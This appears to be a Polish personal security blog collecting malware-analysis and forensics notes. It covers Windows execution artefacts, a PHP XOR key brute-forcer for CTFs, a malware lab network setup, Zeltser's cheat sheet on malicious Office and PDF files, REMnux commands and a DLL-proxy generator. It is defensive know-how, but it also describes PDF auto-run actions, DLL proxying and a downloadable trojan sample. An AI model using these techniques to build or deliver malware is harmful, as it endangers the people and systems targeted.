  • Research: PdbXtract™

    PdbXtract is a tool to help you explore symbolic type information as extracted from Microsoft programming database files.More

  • Research: Mandiant ApateDNS™

    Mandiant ApateDNS is a tool for controlling DNS responses though an easy to use graphical user interface (GUI).More

  • Research: Mandiant Heap Inspector™

    Mandiant Heap Inspector is a heap visualization and analysis tool. It has the ability to collect a process' heaps using both API and raw methods.More

ENISA = udostępnione szkolenia

21 June 2015

mapowanie standardów dla incident response

21 June 2015

 

 

MACCSA - Multinational Alliance for Collaborative Cyber Situational Awareness

 

 

 

Windows forensic - process running

21 June 2015

Możliwości inwestygacji:

  • Prefetch
  • Shimcache (https://dl.mandiant.com/EE/library/Whitepaper_ShimCacheParser.pdf)
    • projekty:
      • python: https://github.com/mandiant/ShimCacheParser   (https://dl.mandiant.com/EE/library/Whitepaper_ShimCacheParser.pdf)
      • C#: https://github.com/woanware/shimcacheparser
  • MUICache
  • UserAssist

 

Ciekawa prezentacja: https://digital-forensics.sans.org/summit-archives/DFIR_Summit/Johnny-AppCompatCache-the-Ring-of-Malware-Brice-Daniels-and-Mary-Singh.pdf

Przekierowanie tcpdump linux - windows

8 June 2015

Linux

ssh xdalny-linux "tcpdump -s0 -w - 'port 8080'" | wireshark -k -i -

 

windows

 

plink -ssh username@remote-host "tcpdump -s 0 -w - 'port 8080'" | wireshark -i -

 

source: https://kaischroed.wordpress.com/2013/01/28/howto-use-wireshark-over-ssh/

Mini malware analyzer

8 June 2015
sudo brctl addbr bridge0
sudo tunctl -t tap0
sudo tunctl -t tap1
sudo tunctl -t tap2
sudo tunctl -t tap3
sudo brctl addif bridge0 tap0
sudo brctl addif bridge0 tap1
sudo brctl addif bridge0 tap2
sudo brctl addif bridge0 tap3
sudo ip l set dev tap0 up
sudo ip l set dev tap1 up
sudo ip l set dev tap2 up
sudo ip l set dev tap3 up
sudo ip l set dev br0 up
sudo ip addr add 192.168.168.50/24 dev bridge0 

 

XOR w CTF oraz sanbox PHP

4 May 2015

Funkcja pomagająca wyszukać XOR'a

Oraz online php sandbox http://sandbox.onlinephpfunctions.com/


function xor_this($string,$int) {

// Let's define our key here
 $key = chr($int) ;

 // Our plaintext/ciphertext
 $text =$string;

 // Our output text
 $outText = '';

 // Iterate through each character
 for($i=0;$i<strlen($text);)
 {
     for($j=0;$j<strlen($key);$j++,$i++)
     {
         $outText .= $text{$i} ^ $key{$j};
         //echo 'i='.$i.', '.'j='.$j.', '.$outText{$i}.'<br />'; //for debugging
     }
 }  
 return $outText;
}

$base64 = "";
$encoded = base64_decode($base64 );



for ($x=1; $x<256; $x++)
{
$phase = xor_this($encoded  ,$x);
echo "key = ".$x." : ".$phase ."\r\n";
echo "----------------------------------------------------------------\r\n";
}

 

UNITE a środowisko malware

Unified Network of Instructors and Trusted Eliminators | 27 April 2015

Poszukiwanie Malware

27 April 2015

Analiza dokumetów

6 April 2015

source: http://zeltser.com/reverse-malware/analyzing-malicious-documents.html

This cheat sheet outlines tips and tools for reverse-engineering malicious documents, such as Microsoft Office (DOC, XLS, PPT) and Adobe Acrobat (PDF) files.

General Approach

  1. Locate potentially malicious embedded code, such as shellcode, VBA macros, or JavaScript.
  2. Extract suspicious code segments from the file.
  3. If relevant, disassemble and/or debug shellcode.
  4. If relevant, deobfuscate and examine JavaScript, ActionScript, or VB macro code.
  5. Understand next steps in the infection chain.

Microsoft Office Binary File Format Notes

Structured Storage (OLE SS) defines a file system inside the binary Microsoft Office file.

Data can be “storage” (folder) and “stream” (file).

Excel stores data inside the “workbook” stream.

PowerPoint stores data inside the “PowerPoint Document” stream.

Word stores data inside various streams.

Tools for Analyzing Microsoft Office Files

OfficeMalScanner locates shellcode and VBA macros from MS Office (DOC, XLS, and PPT) files.

MalHost-Setup extracts shellcode from a given offset in an MS Office file and embeds it an EXE file for further analysis. (Part of OfficeMalScanner)

Offvis shows raw contents and structure of an MS Office file, and identifies some common exploits.

Hachoir-urwid can navigate through the structure of binary Office files and view stream contents.

Office Binary Translator converts DOC, PPT, and XLS files into Open XML files (includes BiffView tool).

pyOLEScanner.py can examine and decode some aspects of malicious binary Office files.

FileHex (not free) and FileInsight hex editors can parse and edit OLE structures.

Useful MS Office Analysis Commands

OfficeMalScanner file.doc scan brute Locate shellcode, OLE data, PE files in file.doc
OfficeMalScanner file.doc info Locate VB macro code in file.doc (no XML files)
OfficeMalScanner file.docx inflate Decompress file.docx to locate VB code (XML files)
MalHost-Setup file.doc out.exe 0x4500 Extract shellcode from file.doc’s offset 0x4500 and create it as out.exe

Adobe PDF File Format Notes

A PDF File is comprised of header, objects, cross-reference table (to locate objects), and trailer.

“/OpenAction” and “/AA” (Additional Action) specifies the script or action to run automatically.

 “/Names”, “/AcroForm”, “/Action” can also specify and launch scripts or actions.

“/JavaScript” specifies JavaScript to run.

 “/GoTo*” changes the view to a specified destination within the PDF or in another PDF file.

 “/Launch” launches a program or opens a document.

“/URI” accesses a resource by its URL.

“/SubmitForm” and “/GoToR” can send data to URL.

“/RichMedia” can be used to embed Flash in PDF.

“/ObjStm” can hide objects inside an Object Stream.

Be mindful of obfuscation with hex codes, such as “/JavaScript” vs. “/J#61vaScript”. (See examples)

Tools for Analyzing Adobe PDF Files

PDFiD identifies PDFs that contain strings associated with scripts and actions.

PDF-parser and Origami’s pdfwalker examines the structure of PDF files.

Origami’s pdfextract and Jsunpack-n’s pdf.py extract JavaScript from PDF files.

PDF Stream Dumper combines many PDF analysis tools under a single graphical user interface.

Peepdf and Origami’s pdfsh offer an interactive command-line shell for examining PDF files.

PDF X-RAY Lite creates an HTML report containing decoded PDF file structure and contents.

SWF mastah extracts SWF objects from PDF files.

Pyew includes commands for examining and decoding structure and content of PDF files.

Useful PDF Analysis Commands

pdfid.py file.pdf Locate script and action-related strings in file.pdf
pdf-parser.py file.pdf Show file.pdf’s structure to identify suspect elements
pdf-parser.py --object id file.pdf Display contents of object id in file.pdf. Add “--filter --raw” to decode the object’s stream.
pdfextract file.pdf Extract JavaScript embedded in file.pdf and save it to file.dump.
pdf.py file.pdf Extract JavaScript embedded in file.pdf and save it to file.pdf.out.
swf_mastah.py –f file.pdf
–o out
Extract PDF objects from file.pdf into the out directory.

Additional PDF Analysis Tools

Malzilla and SpiderMonkey can help deobfuscate JavaScript embedded in malicious PDF files.

Wepawet, Jsunpack, VirusTotal and sandbox tools can analyze some aspects of malicious PDF files.

ExeFilter can filter scripts from Office and PDF files.

References

Adobe Portable Document Format (PDF) Reference

Physical and Logical Structure of PDF Files

Methods for Understanding and Analyzing Targeted Attacks with Office Documents (video)

Analyzing MSOffice Malware with OfficeMalScanner (follow-up presentation)

PDF Security Analysis and Malware Threats

Reverse-Engineering Malware cheat sheet

REMnux Linux distribution for malware analysis.

 

Authored by Lenny Zeltser.

Proxy dla DLL

6 April 2015

Mały programik pomagający zrealizować proxy dla dll.

Generuje na podstawie sygnatury dll odpowiednie nagłówki i kod w C.

Program napisany przez Yonsm na potrzeby swojej pracy.

Bardzo pomocny w celu prześledzenia co robi malware.

Łącząc się z bibliotekami systemowymi

źródło: http://www.tinpont.com/software/aheadlib.html

Zeltser - malware

6 April 2015

source: http://zeltser.com/reverse-malware/malware-analysis-webcast.html

http://zeltser.com/presentations/

Reverse-Engineering Malware Course

 

This webcast introduces you to practical approaches of reverse-engineering malicious software on a Windows system. I cover behavioral and code analysis phases, to make this topic accessible even to individuals with a limited exposure to programming concepts. You'll learn the fundamentals and associated tools to get started with malware analysis.

You can view and listen to the recorded version of this webcast at the SANS website. You can also download my slides, complete with full speaker notes. These slides are also useful when you cannot see full details on your screen while watching the webcast.

The presentation walks you through the analysis of a trojan program. If you'd like to experiment with the specimen, you can download the malicious executable here. The password for the archive is the word "infected". Be careful to take the lab isolation precautions I discuss in the presentation!

To learn how to analyze Windows malware on a Linux system, see my companion webcast Malware Analysis Essentials using REMnux.

If you'd like to learn about the full Reverse-Engineering Malware course I teach at SANS Institute, take a look at the REM course page.

My webcast mentioned a local behavior monitoring tool CaptureBAT. This tool is hard to find on the web. You can download a copy here.

 

 

Authored by Lenny Zeltser.

Analiza podejrzanych plików

6 April 2015

Deobfuscate JavaScript with SpiderMonkey (“js”), “d8”, “rhino-debugger” and Firebug.

Define JavaScript objects using /usr/local/etc/def.js.

You can clean up JavaScript with “js-beautify”.

Control web traffic with “burpsuite” and Tamper Data.

Retrieve websites with “wget” and “curl”.

Hide your origin with “tor start”, “usewithtor”.

Examine malicious Flash files with “swfdump -Ddu”, “flare”, RABCDAsm, and “xxxswf.py”.

Inspect malicious websites and traffic captures with “jsunpackn” after “cd ~remnux/jsunpackn”.

Analiza podejrzanych dokumentów

Examine suspicious Microsoft Office documents with “pyOLEScanner.py” and “hachoir-urwid”.

Navigate through PDFs using “pyew”, “peepdf” and “pdfwalker”.

Extract JavaScript or SWFs from PDFs using “pdfextract”, “pdf.py” and “swf_mastah”.

Examine PDFs using “pdfcop”, “pdf-parser”, “pdfid”, “pdfdecompress” and “pdfxray_lite”.

Emulate shellcode execution using “sctest -Svs”.

Analiza programów wykonywalnych

Scan the executable for suspicious characteristics and packer signatures using “pescanner”.

Check whether the file might be packed using “densityscout” and “bytehist”.

Explore the executable’s internals using “pyew”.

Identify file type using “trid” and “file”.

Scan files for malware signatures using “clamscan” after refreshing signatures with “sudo freshclam”.

Disassemble code using “radare”, “pyew”, “gdb” and “objdump -Mintel -D”.

Extract metadata using “hachoir-metadata”.

Find and extract subfiles using “hachoir-subfile”.

Compare binary files using “vbindiff”.

Find obfuscated or encrypted data with “xorsearch”, “findaes”, "xortool", “aeskeyfind” and “rsakeyfind”.

Decompile Java class files using “jad” and “jd-gui”.

Analyze memory image files using “volatility”.

VirtualBox server

4 April 2015

Dziś stwierdziłem koniec - Windows (as hoster) jest do .... !

Windows 7 Enterprise w wersji 64bit "muli" tak, iż przy uruchamianiu wirtualki / kilku wiertualek  czas jest tragiczny...

rozwiązanie:

Ubuntu + virtualbox + phpVirtualBox i jest wspaniały serwer (host) Vbox:

od strony 25 http://dlc-cdn.sun.com/virtualbox/4.3.26/UserManual.pdf

opis instalacji: http://www.admin-magazine.com/Articles/Server-Virtualization-with-VirtualBox

pomimo świeżej instalacji pojawiły się problemy:

1)  * No suitable module for running kernel found

rozwiązanie: http://askubuntu.com/questions/582109/14-10-virtualbox-no-suitable-module-for-running-kernel-found-cannot-find-ker
+ instalacja z paczki dla debiana opkg -i virtualbox

2) klucze do repozytorium vs konfiguracja bezpieczeństwa sieci wewnętrznej

należy pamiętać o extension pack:

sudo VBoxManage extpack install [ścieżka do ściągnietych z https://www.virtualbox.org/wiki/Downloads]

sprawdzenie:

sudo VBoxManage list extpacks

No i zostało tylko mozolne przeniesienie obrazów ale to już pikuś :)

TAO - The Secret War

z Archiwum razorCMS | 1 May 2012

source: http://www.wired.com/threatlevel/2013/06/general-keith-alexander-cyberwar/all/

Czytając fragment:

"The NSA was able to extract data about the Iranian networks, listen to and record conversations through computer microphones, even reach into the mobile phones of anyone within Bluetooth range of a compromised machine."

   zastanawiam się czy jest to opis wyrwany z fimu s-f, ale możliwość nieskrępowanego ciągu "1" i "0" są nieprawdopodobne jeżeli nie trzeba przechodzić przez konwerter cyfrowo analogowy :)

Kategorie Free Thinking